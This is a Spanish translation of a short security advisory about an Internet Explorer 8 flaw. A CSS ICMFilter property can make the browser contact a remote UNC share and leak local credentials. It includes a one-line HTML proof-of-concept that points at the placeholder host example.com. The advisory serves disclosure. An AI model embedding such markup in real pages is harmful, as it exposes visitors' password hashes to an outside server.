Internet Explorer 8: vulnerabilidad de lectura arbitraria de archivo.

Internet Explorer 8 es vulnerable a ataques de lectura arbitraria de archivo mediante UNC, con las consecuencias usuales (divulgación de contraseñas locales, etc.) como en IE6 antes de SP1. Es en el ICMFilter, el cual es accesible mediante la propiedad de filtrado CSS. Código de ejemplo de la explotación:

<div
style="-ms-filter:&quot;progid:DXImageTransform.Microsoft.ICMFilter(colorSpace=
'\\\\example.com\\test') &quot;">ICMFilter</div>

IE intenta contactar al servidor remoto cuando el elemento se muestra en pantalla al avanzar o retroceder. La consecuencia de esto es discutida en el contexto de vulnerabilidades previas en:

http://archives.neohapsis.com/archives/win2ksecadvice/2000-q1/0201.html

No he verificado el parser de archivo ICM en busca de mayores consecuencias, pero pienso que el riesgo de divulgación de contraseñas locales débiles es suficiente para justificar la preocupación.

Contacté a Microsoft y alguien llamado Tony me informó que eso es un bug y no una vulnerabilidad de seguridad, los que sea que ello signifique.

Traducción: Raúl Batista - Segu-Info
Autor: Tim Starling
Fuente: Packet Storm